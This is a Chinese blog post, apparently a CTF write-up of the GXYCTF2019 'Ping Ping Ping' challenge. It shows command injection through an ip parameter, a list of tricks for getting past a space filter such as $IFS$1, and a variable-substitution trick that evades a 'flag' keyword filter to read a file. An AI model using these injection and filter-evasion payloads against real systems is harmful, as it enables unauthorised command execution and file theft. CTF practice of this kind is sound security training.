当前位置: 首页 > article >正文

[GXYCTF2019]Ping Ping Ping1

article 2025/1/27 3:58:51

题目

传参执行命令

/?ip=127.0.0.1|ls

 

读取flag

空格被过了

以下方法可以绕过空格

${IFS}
$IFS$1
${IFS
%20
<和<>重定向替换
%09

一个一个试发现$IFS$1是行得通的

/?ip=127.0.0.1|cat$IFS$1index.php

查看index.php源码

 flag也被过滤了,发现很多符号都过滤了所以单引号双引号绕过,反斜线绕过这些都行不通了,但仔细观察源码发现有一个变量a可以替换

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

 

拿下flag

flag{d5da3d1e-69ee-4892-8395-6c26d9d5cc2c}


http://www.kler.cn/a/518319.html

相关文章:

  • 03-机器学习-数据获取
  • 单片机基础模块学习——DS18B20温度传感器芯片
  • uva 1354 Mobile Computing
  • PHP防伪溯源一体化管理系统小程序
  • [操作系统] 进程地址空间管理
  • 本地大模型编程实战(02)语义检索(1)
  • Coolbpf最新特性解读:profiler功能上线,助力性能分析和优化
  • C++使用异或找出数组中奇数次出现的数据
  • PageView组件的功能和用法
  • Facebook广告点击率CTR太低 如何优化
  • shell编程-awk使用系统学习
  • 如何部署 Flask 应用程序到生产环境?
  • 人工智能的未来:AGI、ACI与ASI的探索
  • Kimi k1.5:基于大语言模型的多模态强化学习训练技术报告
  • Base64编码解密:解码下载邀请
  • 使用 Tauri 开发桌面应用程序:新一代的轻量解决方案
  • 编写python 后端 vscode 安装插件大全
  • DDD架构实战第七讲总结:分层模型和代码组织
  • Redis内存面试与分析
  • 如何在 Windows 上安装 MySQL(保姆级教程2024版)
  • RocketMQ底层哪里用了Netty
  • 51单片机(四)定时器
  • AI News(1/21/2025):OpenAI 安全疏忽:ChatGPT漏洞引发DDoS风险/OpenAI 代理工具即将发布
  • 25美赛ABCDEF题详细建模过程+可视化图表+参考论文+写作模版+数据预处理
  • 「全网最细 + 实战源码案例」设计模式——抽象工厂模式
  • 利用大语言模型(LLM)增强软件测试自动化的最佳实践